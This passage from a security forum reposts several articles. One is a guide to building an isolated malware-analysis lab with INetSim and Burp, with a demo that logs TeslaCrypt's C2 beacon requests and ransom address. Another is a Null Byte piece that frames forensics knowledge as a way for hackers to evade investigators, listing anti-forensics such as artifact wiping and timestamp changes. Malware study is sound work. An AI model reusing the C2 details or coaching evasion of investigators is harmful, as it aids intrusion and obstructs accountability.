answer yes, and enter the default password (by default osboxes.org). Once the installation is complete, power off the VM. Cloning Now that you have a basic Ubuntu VM ready to go, clone it (right click on it in the main VirtualBox interface > Clone). Name the clone Ubuntu victim, and check the checkbox to reinitialize its MAC address. Select Full clone for the type of clone. The two Ubuntu VMs created Windows 7 machine The download link I provided earlier points to a ZIP archive containing a OVA file. Unlike a VDI file it’s not only a virtual disk, but a full description of the virtual machine (including its virtual disk), so the only thing you need to do to create a virtual machine from it is to select File > Import Appliance in the main window of VirtualBox. If you can afford it, it’s probably better to give it at least 1024 MB of RAM. Once the import process is complete (it can take a few minutes), rename the VM Windows 7 victim and power it on. Install the guest additions Select Devices > Insert guest additions CD image in the menu of the window in which the VM runs, and run the installer from the virtual CD which has been inserted. When you’re done, power off the machine. 2. Setup of the analysis machine: INetSim, Burp INetSim INetSim is a very handy and powerful utility that allows to simulate a bunch of standard Internet services on a machine. By default, it will among others emulate a DNS, HTTP and SMTP that you can easily tune. Since we’ll later configure our victim machines to have no Internet access, we will need INetSim to simulate it. There are several ways to install INetSim. The easiest is to run the following commands (in the analysis machine). $ sudo su $ echo "deb http://www.inetsim.org/debian/ binary/" > /etc/apt/sources.list.d/inetsim.list $ wget -O - http://www.inetsim.org/inetsim-archive-signing-key.asc | apt-key add - $ apt update $ apt install inetsim Note: in order to be able to copy-paste those commands in your analysis machine, select Devices > Shared Clipboard > Bidirectional. We’ll come back later on how to use INetSim. Burp Unfortunately, it seems that INetSim’s SSL support is quite limited: it comes with a certificate for a single host (inetsim.org) and doesn’t support generating SSL certificates on the fly. This is a problem since most malwares nowadays encrypt their communications with SSL. We’ll use Burp as a transparent SSL proxy, which will stand in the middle of the victim machines and INetSim for SSL connections. If you don’t need to intercept SSL traffic for now, you won’t necessarily need Burp. Burp supports generating on-the-fly SSL certificates for any our victim machines will connect to. It also creates a single root CA certificate, that we’ll later import in our victim machines. This way, we’ll be able to intercept the encrypted communications that our malware sends. You can download Burp from the official website. The download is a bash installation script, run it to install Burp: $ bash ~/Downloads/burpsuite_free_linux_v1_7_23.sh By default, the Burp executable will be ~/BurpSuiteFree/BurpSuiteFree. 3. Setting up an isolated virtual network As a reminder, we want to set up an isolated network containing our three VMs. This network will not be able to access the Internet. Also, we want the analysis machine to act as a network gateway to the victim machines in order to easily be able to intercept the network traffic and to simulate various services such as DNS or HTTP. In order to achieve this, we will use a VirtualBox Internal Network. For those familiar with VirtualBox, an internal network differs from a host-only network in that an internal network cannot access the host machine at all. For each of your three virtual machines, do the following: Open its settings Go to the Network section Change the Attached to field to Internal network Enter malware-analysis-network as the network name Network configuration Analysis machine Power on the analysis machine, open a terminal, and run the ifconfig command. You should have an interface named enp0s3. If the name differs, just adapt it in the instructions to follow. Open the file /etc/network/interfaces as root, and add the following at the end: auto enp0s3 iface enp0s3 inet static address 10.0.0.1 netmask 255.255.255.0 This will assign the machine the static IP 10.0.0.1 on our virtual network. Now that we have configured the network interface, we need to start it up using: $ sudo ifup enp0s3 Ubuntu victim machine The process is very similar here, except that we’ll assign it the static IP 10.0.0.2, and instruct it to use 10.0.0.1 as a gateway and as a DNS server. Append the following at the end of the file /etc/network/interfaces : auto enp0s3 iface enp0s3 inet static address 10.0.0.2 gateway 10.0.0.1 netmask 255.255.255.0 dns-nameservers 10.0.0.1 And run: $ sudo ifup enp0s3 $ sudo service networking restart You should now be able to ping the analysis machine: $ ping 10.0.0.1 PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data. 64 bytes from 10.0.0.1: icmp_seq=1 ttl=64 time=0.480 ms 64 bytes from 10.0.0.1: icmp_seq=2 ttl=64 time=0.526 ms Windows 7 victim machine Right-click on the network icon in the taskbar (or go to Start Menu > Control Panel > Network and Internet > Network and Sharing center), click on Local Area Connection 2 > Properties, select on Internet Protocol Version 4, and click on the Properties button. We’ll assign the static IP 10.0.0.3 to the machine, and configure the rest similarly to the Ubuntu victim machine. Network settings Make sure to validate the settings (click on OK, Apply, etc. until all the settings windows are gone). You should now be able to ping the analysis machine: > ping 10.0.0.1 Pinging 10.0.0.1 with 32 bytes of data: Reply from 10.0.0.1: bytes=32 time<1ms TTL=64 Reply from 10.0.0.1: bytes=32 time<1ms TTL=64 All set! 4. Creating and restoring snapshots Now that our victim VMs are properly configured and are in a clean state (i.e. not infected by any kind of malware), we are going to make a snapshot of their current state. This way, we will be able to easily reset them to this clean state at any point time. VirtualBox makes this very easy: in the window in which the VM is running, just select Machine > Take Snapshot. You can name the snapshot Clean state. Make sure to do this for both your Ubuntu and Windows 7 victim machines. It doesn’t hurt to do it for your analysis machine as well. When you’ll want to reset a machine to its clean state, simply power it off and check the checkbox Restore current snapshot ‘Clean state’. 5. Using INetSim and Burp on the analysis machine to analyze the network traffic INetSim As previously mentioned, INetSim enables us to wide range of standard Internet services including DNS, HTTP(S), SMTP, etc. It has a default configuration file /etc/inetsim/inetsim.conf which is very well documented. It also ships with a data directory (/var/lib/inetsim) containing various default files. Since you’ll probably want a different INetSim configuration each time you make a new analysis, I suggest you create a directory analysis which will contain a sub directory for each analysis. $ mkdir analysis We’ll already create a sub directory for the sake of example, and copy the default INetSim configuration file and data folder in it. $ mkdir analysis/test-analysis $ cp /etc/inetsim/inetsim.conf analysis/test-analysis $ sudo cp -r /var/lib/inetsim analysis/test-analysis/data $ sudo chmod -R 777 data $ cd analysis/test-analysis By default, INetSim listens on the local interface only. To make it available to all the machines of our virtual network, replace the following line in the configuration file we just copied: #service_bind_address 10.0.0.1 By: service_bind_address 0.0.0.0 Now, we need to disable systemd-resolved, which is a local DNS server shipped by default with Ubuntu and will conflict with INetSim’s DNS server. $ sudo systemctl disable systemd-resolved.service $ sudo service systemd-resolved.service stop By default, INetSim’s DNS server will resolve all the domain names to 127.0.0.1. We want any domain name to resolve to 10.0.0.1 (the analysis machine IP) instead; uncomment the following line: #dns_default_ip 10.0.0.1 I mentioned earlier that INetSim’s SSL support is not optimal since it only has a single certificate for a single hostname (inetsim.org) and doesn’t allow to generate per-host certificates on the fly. To overcome that, we’ll run Burp on port 443 as a transparent proxy in front of INetSim. Therefore, we need to bind INetSim’s HTTPS server to a different port, say port 8443. Replace the following line: #https_bind_port 443 By: https_bind_port 8443 Now, let’s run INetSim! $ sudo inetsim --data data --conf inetsim.conf INetSim 1.2.6 (2016-08-29) by Matthias Eckert & Thomas Hungenberg [...] === INetSim main process started (PID 3605) === Session ID: 3605 Listening on: 0.0.0.0 Real Date/Time: 2017-06-04 12:58:07 Fake Date/Time: 2017-06-04 12:58:07 (Delta: 0 seconds) Forking services... * dns_53_tcp_udp - started (PID 3621) * irc_6667_tcp - started (PID 3631) * daytime_13_tcp - started (PID 3638) * discard_9_tcp - started (PID 3642) * discard_9_udp - started (PID 3643) * ident_113_tcp - started (PID 3634) * syslog_514_udp - started (PID 3635) [...] As you can see, INetSim has launched a bunch of network services. Those are all configurable and can be disabled in the configuration file. This configuration file is very well documented and explains all the options of INetSim; I recommend you take a few minutes to read it. Now, power on of your victim VM, open a web browser, and browse to any address (e.g. github.com). You should see the following: (Note that this default file corresponds to the HTML file data/http/fakefiles/sample.html.) Back on the analysis machine, shut down INetSim (CTRL + C). * dns_53_tcp_udp - stopped (PID 3621) * irc_6667_tcp - stopped (PID 3631) * daytime_13_tcp - stopped (PID 3638) [...] Simulation stopped. Report written to '/var/log/inetsim/report/report.3877.txt' (24 lines) As you can see, INetSim has created a summary report for us. It contains all the interactions our victim machine had with INetSim services. === Report for session '3877' === Real start date : 2017-06-04 13:18:27 Simulated start date : 2017-06-04 13:18:27 Time difference on startup : none 2017-06-04 13:18:38 First simulated date in log file 2017-06-04 13:18:40 DNS connection, type: A, class: IN, requested name: github.com 2017-06-04 13:18:40 HTTP connection, method: GET, URL: http://github.com/, file name: data/http/fakefiles/sample.html 2017-06-04 13:18:40 HTTP connection, method: GET, URL: http://github.com/favicon.ico, file name: data/http/fakefiles/sample.html 2017-06-04 13:18:40 Last simulated date in log file Burp for SSL interception To be able to analyze the SSL traffic, we also need to run Burp. We’ll run it as a transparent proxy in front of INetSim. When a victim machine will initiate a SSL connection, it will first go to Burp, which will then proxy it to INetSim. This section is not mandatory: if you don’t need to intercept SSL traffic right now, just jump to the next section. Here’s how it will look like with Burp in the middle: Start Burp as root: $ sudo /home/osboxes/BurpSuiteFree/BurpSuiteFree (We need to run it as root otherwise it won’t be able to bind port 443, which is a privileged port. There are other ways to do this, but let’s not bother here) Create a temporary project (you don’t have any other options with the free version anyway), and go to the Proxy tab, then to the Options sub-tab. You’ll see Burp’s default listener listening on port 8080. Click on the row corresponding to the default listener, and edit it (Edit) button. Configure it as follows: Binding tab Bind to port: 443 Bind to address: all interfaces Request handling tab: Redirect to host: localhost Redirect to port: 8443 Check Support invisible proxying Validate the settings, and you should get a listener similar to: By default, Burp intercepts the incoming requests and waits for you to explicitly let them pass through. To avoid this, go to the Intercept tab and click the button Intercept is on to disable it. Since Burp Free doesn’t allow you to save a project, you can export the settings we just made in order to import them next time you start Burp. To do this, use Burp > Project options > Save project options. Let’s make sure our setup if correctly working. Start INetSim, and run: $ curl --insecure https://localhost You should get: <html> <head> <title>INetSim default HTML page</title> </head> <body> <p></p> <p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p> <p align="center">This file is an HTML document.</p> </body> </html> Importing Burp’s CA certificate on our victim machines Power on your Windows 7 victim machine, and try to browse to a HTTPS URL (e.g. https://github.com), you’ll see a warning similar to: This is because Burp generates a SSL certificate signed by its own CA certificate, which our victim machine doesn’t trust for now. In Burp, add a new proxy listener on port 8080, listening on all interfaces (tab Proxy > Options > button Add): Then, from the victim machine, browse to http://10.0.0.1:8080. Click on CA Certificate in the top-right corner to download Burp’s CA certificate. On the Windows 7 victim machine: open the file, click Install certificate > Next > Place all certificates in the following store: Trusted Root Certification Authorities > Next On the Ubuntu victim machine: Convert the certificate to the appropriate format (.crt) using $ openssl x509 -in ~/Downloads/cacert.der -inform DER -out burp.crt Copy it to /usr/local/share/ca-certificates $ sudo cp burp.crt /usr/local/share/ca-certificates/ Run $ sudo update-ca-certificates Firefox by default doesn’t use the system’s certificate store. If you want the SSL connection to work properly in Firefox as well, go to the Firefox settings into Advanced > Certificates > Import. Choose burp.crt, check Trust this CA to identify websites All set! Once you imported Burp’s CA certificate in the victim machines, make sure to create a new snapshot (e.g. Clean state with Burp’s CA certificate installed). 6. Setting up a shared folder between the analysis machine and the host OS At some point, you’ll obviously want to transfer some files to the analysis machine or to one of the victim machine; we’ll set up a file share to achieve it. In the VirtualBox running the analysis machine, go to Devices > Shared Folders > Shared folders settings. Create a new shared folder, choose the local folder of your host OS it should be mapped to, and choose a name. Check the checkbox to make it permanent. Now on the analysis machine, mount the shared folder: $ mkdir ~/malware-analysis-share $ sudo mount -t vboxsf -o uid=$UID,gid=$(id -g) malware-analysis-share ~/malware-analysis-share And you’re good to go. In my case, all the files of my host machine located in /home/christophetd/malware-analysis-share will also end up in ~/malware-analysis-share in the analysis machine. Transferring files to a victim machine At some point, you’ll most probably need to transfer some files (e.g. malware samples) to one of the victim machines. Setting up a file share for them is a bad idea, because it means the victim machine (and by extent, the malware sample you’re running on it) have access to it. The simplest way to achieve a file transfer to the Ubuntu victim machine is to use netcat. Here’s a quick example. # Receiving machine having IP 10.0.0.2 $ nc -lvp 4444 > file.exe # Analysis machine (sender) $ cat file_to_transfer.exe | nc 10.0.0.2 4444 For a Window victim, we unfortunately don’t have netcat available. Alternatives might exist, but they probably don’t ship by default. One option is to use INetSim to serve your file to the victim machine. # inetsim.conf # Remove the default line: http_fakefile exe sample_gui.exe x-msdos-program # Replace it by http_fakefile exe file_to_transfer.exe x-msdos-program # And put file_to_transfer.exe in ./data/http/fakefiles With this of configuration, just browse any URL ending with a ‘.exe’ (e.g. http://github.com/file.exe). 7. Demo time: the TeslaCrypt ransomware Time for a quick demo! I downloaded a sample of the ransomware TeslaCrypt, transferred it to our Windows 7 victim machine, and executed it. After a few seconds, all the files of the VM have been encrypted and the following window pops-up. TeslaCrypt main window (click for full-size image) The machine’s files have been encrypted and replaced by files with the ECC extension After checking the logs of INetSim, we can see that the ransomware did the following DNS lookups: 7tno4hib47vlep5o.tor2web.org 7tno4hib47vlep5o.tor2web.blutmagie.de 7tno4hib47vlep5o.tor2web.fi bitcoin.toshi.io And sent several HTTP requests to those domains. HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.org/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh6a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzA= HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.blutmagie.de/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh6a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzE= HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.fi/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh6a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzI= HTTPS connection, method: GET, URL: https://bitcoin.toshi.io/api/v0/addresses/1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT We see similar requests are made to tor2web.org, tor2web.blutmagie.de and tor2web.fi. Those services allow to access the Tor network without having to install Tor Browser or a similar tool. The malware contacts the Tor hidden service 7tno4hib47vlep5o.onion, which is probably some kind of C&C server. The payload of the request is a base64 encoded string, which decodes to: Subject=Ping &key=15B38B18AF20C0DB2A7C771E014363F2CB8781B156D519CC5F220335D4714AA3 &addr=1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT &files=0 &size=0 &version=0.2.6a &date=1496648675 &OS=7601 &ID=16 &subid=0 &gate=G1 It also makes an API call to bitcoin.toshio.io (which doesn’t exist anymore), most probably to check if the ransom has been paid to the bitcoin address 1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT. It seems like the malware generates an unique bitcoin address for each infected computer, since the address didn’t receive or send out any money. Conclusion Hopefully this guide will be helpful and allow you to safely analyze the network interactions of a malware. Keep in mind that some malwares detect when they are being run in a virtual machine and might adapt their behavior (e.g. do nothing). Here’s an article from MalwareBytes on the subject. Also, remember that while analyzing a malware’s network traffic can be very useful, it’s only one kind of dynamic analysis. Others include monitoring the register, the system calls, the files opened / created, etc. Open Security Training offers a full hands-on course on the topic, for free. Don’t hesitate to leave a comment if you found this guide useful / awesome / too long / too detailed. A big thank you to lbarman for the proofreading and numerous suggestions. Stay safe! Sursa: https://blog.christophetd.fr/set-up-your-own-malware-analysis-lab-with-virtualbox-inetsim-and-burp/
  22. So many readers in the Null Byte community have been asking me questions about evading detection and hacking undetected that I decided to start a new series on digital forensics. I applaud each of you for your concern, as the last thing I want to see is one of you getting caught and spending years locked up in a 8 x 8 concrete room with a violent and lascivious cellmate. You can never be too cautious in this field of endeavor. The best way to evade detection is to understand what the other side is doing and using. So, this series will focus on the tools and techniques that law enforcement and the security engineers are using to detect and prosecute hackers around the world. What Is Digital Forensics? Digital forensics is the field of determining who was responsible for a digital intrusion or other computer crime. It uses a wide-range of techniques to gain attribution to the perpetrator. It relies upon the fundamental concept that whenever a digital intrusion or crime is committed, the perpetrator inadvertently leaves a bit of themselves behind for the investigator to find. These "bits" could be entries in log files, changes to the registry, hacking software, malware, remnants of deleted files, etc. All of these can provide clues and evidence to determine their identity and lead to the capture and arrest of the hacker. As a hacker, the more you know and understand about digital forensics, the better you can evade the standard forensic techniques and even implement anti-forensic measures to throw off the investigator. The Digital Forensic Tools Just like in hacking, there are a number of software tools for doing digital forensics. For the hacker, becoming familiar with these tools and how they work is crucial to evading them. Most digital forensic investigators rely upon three major commercial digital forensic suites. Guidance Software's EnCase Forensic Access Data's Forensic Tool Kit (FTK) Prodiscover These three suites are comprised of multiple tools and reporting features and can be fairly expensive. While these suites are widely used by law enforcement, they use the same or similar techniques as the free open-source suites without the fancy interfaces. By using the open source and free suites, we can come to understand how such tools as EnCase work without the expense. EnCase is the most widely used tool by law enforcement, but not necessarily the most effective and sophisticated. These tools are designed for user-friendliness, efficiency, certification, good training, and reporting. There are a number of the free, open-source forensic suites, including the following three. The Sleuthkit Kit (TSK) Helix Knoppix We will look at each of these suites to better understand what digital forensic investigators can see and find about an intrusion and the perpetrator. The Forensic Tools Available in BackTrack In addition, there are a large number of individual tools that are available for digital forensics, some of which are available in our BackTrack and Kali distributions. Some of the better tools in BackTrack include the following, among many others. sleuthkit truecrypt hexedit autopsy iphoneanalyzer rifiuti2 ptk exiftool evtparse.pl fatback scalpel dc3dd driftnet timestomp What Can Digital Forensics Do? Digital forensics can do many things, all of which the aspiring hacker should be aware of. Below is a list of just some of the things. Recovering deleted files, including emails Determine what computer, device, and/or software created the malicious file, software, and/or attack Trail the source IP and/or MAC address of the attack Track the source of malware by its signature and components Determine the time, place, and device that took a picture Track the location of a cell phone enabled device (with or without GPS enabled) Determine the time a file was modified, accessed or created (MAC) Crack passwords on encrypted hard drives, files, or communication Determine which websites the perpetrator visited and what files he downloaded Determine what commands and software the suspect has utilized Extract critical information from volatile memory Determine who hacked the wireless network and who the unauthorized users are And that' just some of the things you can do with digital forensics! What Is Anti-Forensics? Anti-forensics are techniques that can be used to obfuscate information and evade the tools and techniques of the forensic investigator. Some of these techniques include the following. Hiding Data: Hiding data can include such things as encryption and stegonography. Artifact wiping: Every attack leaves a signature or artifact behind. Sometimes it's wise to attempt to wipe these artifacts from the victim machine so as to leave no tell-tale trail for the investigator. Trail Obfuscation: A decent forensic investigator can trail nearly any remote attack to a IP address and/or MAC address. Trail obfuscation is a technique that leads them to another source of the attack, rather than the actual attack. Change the timestamp: Change the file timestamp (modify, access, and change) to evade detection by forensic tools. Stay Tuned for More on Digital Forensics We will spend some of my future Null Byte tutorials looking at the most widely-used techniques in digital forensics, using both commercial and open-source tools, and then advance to anti-forensics, or ways to evade detection from these tools and the forensic investigator. So, to learn the techniques law enforcement and security engineers are using to track hackers, along with how to avoid and evade, keep coming back here! Sursa: https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-1-tools-techniques-0149732/ part x: https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-2-network-forensics-0149958/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-3-recovering-deleted-files-0149868/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-4-evading-detection-while-dosing-0150445/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-5-windows-registry-forensics-0160561/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-6-using-ida-pro-0161643/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-7-windows-sysinternals-0162080/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-8-more-windows-registry-forensics-0162609/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-9-finding-storage-device-artifacts-registry-0164221/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-10-identifying-signatures-port-scan-dos-attack-0164805/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-11-using-splunk-0167012/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-12-windows-prefetch-files-0167643/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-13-browser-forensics-0168280/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-14-live-memory-forensics-0168337/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-15-parsing-out-key-info-from-memory-0169435/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-16-extracting-exif-data-from-image-files-0170128/
  23. La testul "SITUATIONAL" din data de ai obtinut un punctaj de din 27, care te situeaza peste media aplicantilor. La testul "CULTURA GENERALA" din data de ai obtinut un punctaj de din 33, care te situeaza peste media aplicantilor. Felicitări! Dacă nu cumva suntem deja colegi, vei trece cu siguranţă probele noastre aptitudinale. Ai reale calități pentru spionaj, gândește-te! @QuoVadis cat iti iese pe agent recrutat?
×
×
  • Create New...